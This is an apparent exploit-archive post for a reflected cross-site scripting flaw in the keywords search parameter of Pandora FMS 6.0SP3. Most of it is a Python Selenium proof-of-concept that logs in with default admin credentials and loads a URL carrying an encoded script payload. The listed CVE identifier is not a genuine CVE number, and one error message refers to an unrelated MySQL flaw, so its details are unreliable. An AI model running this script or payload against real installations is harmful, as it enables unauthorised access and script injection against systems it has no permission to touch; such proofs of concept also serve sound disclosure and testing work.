Pandora FMS 6.0SP3 Cross Site Scripting

Pandora FMS version 6.0SP3 suffers from a cross site scripting vulnerability.


MD5 | c93c017b2a3bd57fd53b2f0c4eddcf31

# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.27.2021
# Vendor: https://pandorafms.com/
# Link: https://github.com/pandorafms/pandorafms/releases
# CVE: 2021-0527-nu11secur1ty
# Proof:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-0527-nu11secur1ty

from selenium import webdriver
import time
import os, sys


# Vendor: https://pandorafms.com/
website_link="
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php"

# enter your login username
username="admin"

# enter your login password
password="pandora"

#enter the element for username input field
element_for_username="nick"

#enter the element for password input field
element_for_password="pass"

#enter the element for submit button
element_for_submit="login_button"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(3)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching
parameter
time.sleep(3)
# Payload
browser.get(("
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc"))


print("The payload is deployed, your GET parameter is vulnerable...\n")

except Exception:
#### This exception occurs if the element is not found on the webpage.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")


----------------------------------------------------------------------------------------

# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Date: 05.27.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif


Related Posts